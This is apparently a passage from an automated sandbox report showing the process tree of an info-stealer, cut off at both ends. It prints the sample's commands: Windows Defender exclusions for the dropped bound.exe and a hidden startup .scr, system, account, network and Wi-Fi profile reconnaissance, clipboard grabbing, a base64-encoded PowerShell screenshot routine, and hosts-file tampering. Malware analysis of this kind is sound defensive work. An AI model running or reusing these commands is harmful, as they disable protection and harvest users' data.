      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    PID:2376
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    PID:5736
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      PID:4924
    - - C:\Users\Admin\AppData\Local\Temp\bound.exe
        
        bound.exe
        5⤵
        Executes dropped EXE
        
        PID:5724
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:4916
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        6⤵
        
        PID:208
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        7⤵
        Detects videocard installed
        
        PID:2032
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
        6⤵
        
        PID:536
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get Manufacturer
        7⤵
        
        PID:2040
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "gdb --version"
        6⤵
        
        PID:3372
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        6⤵
        
        PID:4248
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:3280
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
        6⤵
        
        PID:2420
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_ComputerSystem get Manufacturer
        7⤵
        
        PID:1632
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        6⤵
        
        PID:5880
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        7⤵
        
        PID:5320
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        6⤵
        
        PID:3556
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:5428
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        6⤵
        
        PID:5840
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:2240
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
        6⤵
        
        PID:3348
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        7⤵
        
        PID:5056
        
        C:\Windows\system32\chcp.com
        
        chcp
        8⤵
        
        PID:3680
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
        6⤵
        
        PID:1012
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        7⤵
        
        PID:4972
        
        C:\Windows\system32\chcp.com
        
        chcp
        8⤵
        
        PID:1768
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:1792
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        
        PID:3708
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
        6⤵
        Clipboard Data
        
        PID:4076
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Get-Clipboard
        7⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:3156
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
        6⤵
        Network Service Discovery
        
        PID:5620
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        7⤵
        Gathers system information
        
        PID:1296
        
        C:\Windows\system32\HOSTNAME.EXE
        
        hostname
        7⤵
        
        PID:5736
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic logicaldisk get caption,description,providername
        7⤵
        Collects information from the system
        
        PID:5380
        
        C:\Windows\system32\net.exe
        
        net user
        7⤵
        
        PID:3372
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        8⤵
        
        PID:2544
        
        C:\Windows\system32\query.exe
        
        query user
        7⤵
        
        PID:4204
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        8⤵
        
        PID:3608
        
        C:\Windows\system32\net.exe
        
        net localgroup
        7⤵
        
        PID:1132
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup
        8⤵
        
        PID:4988
        
        C:\Windows\system32\net.exe
        
        net localgroup administrators
        7⤵
        
        PID:5972
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        8⤵
        
        PID:5772
        
        C:\Windows\system32\net.exe
        
        net user guest
        7⤵
        
        PID:2148
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user guest
        8⤵
        
        PID:2264
        
        C:\Windows\system32\net.exe
        
        net user administrator
        7⤵
        
        PID:5524
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user administrator
        8⤵
        
        PID:5924
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic startup get caption,command
        7⤵
        
        PID:1228
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /svc
        7⤵
        Enumerates processes with tasklist
        
        PID:5824
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        7⤵
        Gathers network information
        
        PID:2860
        
        C:\Windows\system32\ROUTE.EXE
        
        route print
        7⤵
        
        PID:60
        
        C:\Windows\system32\ARP.EXE
        
        arp -a
        7⤵
        Network Service Discovery
        
        PID:5632
        
        C:\Windows\system32\NETSTAT.EXE
        
        netstat -ano
        7⤵
        System Network Connections Discovery
        Gathers network information
        
        PID:5008
        
        C:\Windows\system32\sc.exe
        
        sc query type= service state= all
        7⤵
        Launches sc.exe
        
        PID:5820
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall show state
        7⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4800
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall show config
        7⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3648
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        6⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4892
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        7⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5080
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        6⤵
        
        PID:1288
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        7⤵
        
        PID:4208
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        6⤵
        
        PID:2032
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        7⤵
        
        PID:4944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2280
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:5888
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    PID:5852
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    PID:5156
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:2248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:3128
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:6080
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:5844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'"
    3⤵
    PID:2424
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:224
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2100
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:2036
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:2696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:3348
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:4668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2340
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5924
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3156
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:1636
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:1680
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:3168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:4032
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4208
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aenkumnx\aenkumnx.cmdline"
        5⤵
        
        PID:4132
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE5A8.tmp" "c:\Users\Admin\AppData\Local\Temp\aenkumnx\CSCC982984F37B74D259B2D4E2250EAB2FF.TMP"
        6⤵
        
        PID:3128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1260
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4420
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:2032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:208
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2040
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4076
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:3648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2824
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3764
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3924
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4604
- - C:\Windows\system32\cmd.exe
